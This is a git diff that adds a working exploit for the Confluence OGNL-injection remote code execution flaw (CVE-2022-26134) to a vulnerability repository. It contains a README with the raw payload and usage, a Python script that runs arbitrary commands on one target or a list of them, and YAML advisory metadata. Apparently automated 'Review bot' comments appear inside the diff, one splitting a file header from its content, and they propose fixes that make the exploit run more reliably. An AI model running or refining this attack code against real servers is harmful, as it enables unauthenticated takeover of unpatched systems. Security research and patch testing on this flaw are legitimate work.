diff --git a/cve/confluence/2022/CVE-2022-26134/README.md b/cve/confluence/2022/CVE-2022-26134/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..81ac4c1d623dece5ad77a5dd7639806015b9e9f0
--- /dev/null
+++ b/cve/confluence/2022/CVE-2022-26134/README.md
@@ -0,0 +1,54 @@
+# Confluence Pre-Auth Remote Code Execution via OGNL Injection (CVE-2022-26134)
+Confluence Pre-Auth Remote Code Execution via OGNL Injection (CVE-2022-26134)
+
+- On June 02, 2022 Atlassian released a security advisory for their Confluence Server and Data Center applications, highlighting a critical severity unauthenticated remote code execution vulnerability. The OGNL injection vulnerability allows an unauthenticated user to execute arbitrary code on a Confluence Server or Data Center instance.
+
+### IMPORTANT
+This exploit is only intended to facilitate demonstrations of the vulnerability by researchers. I didn't recommend of illegal actions and take no responsibility for any malicious use of this script.
+
+
+#### • Request Example
+![]()![BurpRequest](https://user-images.githubusercontent.com/6265911/172087965-68f12d26-e3c7-429d-b2c5-639121922f1e.png)
+
+
+### Exploit Usage
+
+```
+python3 exploit.py -h
+Usage: exploit.py [options]
+
+Options:
+ -h, --help show this help message and exit
+ -u URL, --url=URL Base target uri (ex. http://target-uri/)
+ -f FILEHOSTS, --file=FILEHOSTS
+ example.txt
+ -t THREADS_SET, --threads=THREADS_SET
+ -m TIMEOUT, --maxtimeout=TIMEOUT
+ -o OUTPUT, --output=OUTPUT
+ -c COMMAND, --cmd=COMMAND
+ ```
+
+
+#### Exploit single target:
+`$ python3 exploit.py -u http://xxxxx.com -c id`
+
+![]()![xpl1](https://user-images.githubusercontent.com/6265911/172089213-ea07c33f-8944-41c5-b6fc-8f3e9250d928.PNG)
+
+
+
+#### Exploit multitargets
+`$ python3 exploit.py -f urls.txt -p -c id `
+
+![]()![xpl2](https://user-images.githubusercontent.com/6265911/172089219-3300095f-2ee8-417a-944f-01d32c8aedef.PNG)
+
+
+
+# OGNL expression
+```${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}```
+
+
+
+# References:
+ • [https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html](https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html)
+
+ • [https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis](https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis)
diff --git a/cve/confluence/2022/CVE-2022-26134/exploit.py b/cve/confluence/2022/CVE-2022-26134/exploit.py
new file mode 100644
index 0000000000000000000000000000000000000000..2ddfc6d7057240c44683681b5e9e392a87143acd
--- /dev/null
+++ b/cve/confluence/2022/CVE-2022-26134/exploit.py
@@ -0,0 +1,114 @@
+
+#!/usr/bin/python3
+
+# Exploit Title: Confluence Pre-Auth Remote Code Execution via OGNL Injection
+# Google Dork: N/A
+# Date: 06/006/2022
+# Exploit Author: h3v0x
+# Vendor Homepage: https://www.atlassian.com/
+# Software Link: https://www.atlassian.com/software/confluence/download-archives
+# Version: All < 7.4.17 versions before 7.18.1
+# Tested on: -
+# CVE : CVE-2022-26134
+# https://github.com/h3v0x/CVE-2022-26134
+
+import sys
+import requests
+import optparse
+import multiprocessing
+
+from requests.packages import urllib3
+from requests.exceptions import MissingSchema, InvalidURL
+urllib3.disable_warnings()
+
+requestEngine = multiprocessing.Manager()
+session = requests.Session()
+
+global paramResults
+paramResults = requestEngine.list()
+globals().update(locals())
+
+def spiderXpl(url):
+ globals().update(locals())
+ if not url.startswith('http'):
+ url='http://'+url
+
+ headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36",
+ "Connection": "close",
+ "Accept-Encoding": "gzip, deflate"}
+
+ try:
+ response = requests.get(url + '/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22'+optionsOpt.command+'%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/', headers=headers, verify=False, allow_redirects=False)
+ if(response.status_code == 302):
+ print('Found: '+url+' // '+ response.headers['X-Cmd-Response'])
+
+ inputBuffer = str(response.headers['X-Cmd-Response'])
+ paramResults.append('Vulnerable application found:'+url+'\n''Command result:'+inputBuffer+'\n')
+ else:
+ pass
+
+ except requests.exceptions.ConnectionError:
+ print('[x] Failed to Connect: '+url)
+ pass
+ except multiprocessing.log_to_stderr:
+ pass
+ except KeyboardInterrupt:
+ print('[!] Stoping exploit...')
+ exit(0)
+ except (MissingSchema, InvalidURL):
+ pass
+
+
+def banner():
+ print('[-] CVE-2022-26134')
+ print('[-] Confluence Pre-Auth Remote Code Execution via OGNL Injection \n')
+
+
+def main():
+ banner()
+
+ globals().update(locals())
+
+ sys.setrecursionlimit(100000)
+
+ if not optionsOpt.filehosts:
+ url = optionsOpt.url
+ spiderXpl(url)
+ else:
+ f = open(optionsOpt.filehosts)
+ urls = map(str.strip, f.readlines())
+
+ multiReq = multiprocessing.Pool(optionsOpt.threads_set)
+ try:
+ multiReq.map(spiderXpl, urls)
+ multiReq.close()
+ multiReq.join()
+ except UnboundLocalError:
+ pass
+ except KeyboardInterrupt:
+ exit(0)
+
+
+ if optionsOpt.output:
+ print("\n[!] Saving the output result in: %s" % optionsOpt.output)
+
+ with open(optionsOpt.output, "w") as f:
+ for result in paramResults:
+ f.write("%s\n" % result)
+ f.close()
+
+if __name__ == "__main__":
+ parser = optparse.OptionParser()
+
+ parser.add_option('-u', '--url', action="store", dest="url", help='Base target uri (ex. http://target-uri/)')
+ parser.add_option('-f', '--file', dest="filehosts", help='example.txt')
+ parser.add_option('-t', '--threads', dest="threads_set", type=int,default=10)
+ parser.add_option('-m', '--maxtimeout', dest="timeout", type=int,default=8)
+ parser.add_option('-o', '--output', dest="output", type=str, default='exploit_result.txt')
+ parser.add_option('-c', '--cmd', dest="command", type=str, default='id')
+ optionsOpt, args = parser.parse_args()
+
+ main()
+
+
+
diff --git a/cve/confluence/2022/yaml/CVE-2022-26134.yaml b/cve/confluence/2022/yaml/CVE-2022-26134.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..76029829737b632d6d4fddffb976533ec03272ea
--- /dev/null
+++ b/cve/confluence/2022/yaml/CVE-2022-26134.yaml
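Review bot: `except multiprocessing.log_to_stderr:` in spiderXpl's handler chain names a function rather than an exception class, so any exception that is not a ConnectionError and is matched against that clause is replaced by `TypeError: catching classes that do not inherit from BaseException is not allowed`, hiding the real error; drop that clause and its `pass`. The `-m/--maxtimeout` option is parsed into `optionsOpt.timeout` but never read anywhere in the file, so it is documented yet has no effect, and the README added in this commit shows `-f urls.txt -p -c id` although no `-p` option is defined, so optparse will reject that example. The header line `# Version: All < 7.4.17 versions before 7.18.1` disagrees with the fixed-version list the accompanying CVE-2022-26134.yaml gives (7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4, 7.18.1); consider `# Version: releases before 7.4.17 / 7.13.7 / 7.14.3 / 7.15.2 / 7.16.4 / 7.17.4 / 7.18.1`. In main, `f = open(optionsOpt.filehosts)` is never closed, while the `f.close()` inside the `with open(optionsOpt.output, "w")` block is redundant; `session = requests.Session()` and `sys.setrecursionlimit(100000)` are unused and can go.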
@@ -0,0 +1,27 @@
+id: CVE-2022-26134
+source: https://github.com/h3v0x/CVE-2022-26134
+info:
+ name: Confluence是一个专业的企业知识管理与协同软件,可用于构建企业wiki。
+ severity: critical
+ description: |
+ Atlassian Confluence存在远程代码执行漏洞,攻击者可以利用该漏洞直接获取目标系统权限。
+ scope-of-influence:
+ Confluence Server&Data Center ≥ 1.3.0
+ Atlassian Confluence Server and Data Center <7.4.17
+ Atlassian Confluence Server and Data Center <7.13.7
+ Atlassian Confluence Server and Data Center <7.14.3
+ Atlassian Confluence Server and Data Center <7.15.2
+ Atlassian Confluence Server and Data Center <7.16.4
+ Atlassian Confluence Server and Data Center <7.17.4
+ Atlassian Confluence Server and Data Center <7.18.1
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-26134
+ - https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2022-26134
+ cwe-id: CWE-74
+ cnvd-id: None
+ kve-id: None
+ tags: RCE,cve2022
\ No newline at end of file
diff --git a/vulnerability_list.yaml b/vulnerability_list.yaml
index 14afa0d8ea91c15f56c3f689807434b544153e5b..7b2d84edc3633ab6bbd014e93bf05f1864e97b87 100644
--- a/vulnerability_list.yaml
+++ b/vulnerability_list.yaml
@@ -18,5 +18,6 @@ cve:
 confluence:
 - CVE-2019-3396
 - CVE-2021-26084
+ - CVE-2022-26134
 cnvd:
 kve:
\ No newline at end of file
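Review bot: `scope-of-influence:` in CVE-2022-26134.yaml is followed by eight unquoted lines with no `|` and no `-`, so a YAML loader should fold them into one space-joined plain scalar rather than keeping the affected ranges as separate entries; if consumers iterate over this field, write it as a sequence (`- Confluence Server&Data Center ≥ 1.3.0` and so on) or as a block scalar with `|` the way `description:` just above it is written. `cnvd-id: None` and `kve-id: None` load as the string "None" rather than a YAML null (`null` or `~`) — presumably intentional if the rest of the repo uses the same convention, but worth confirming. The `name:` value describes the product rather than naming the vulnerability, which looks swapped with the `description:` text; and the file ends without a trailing newline.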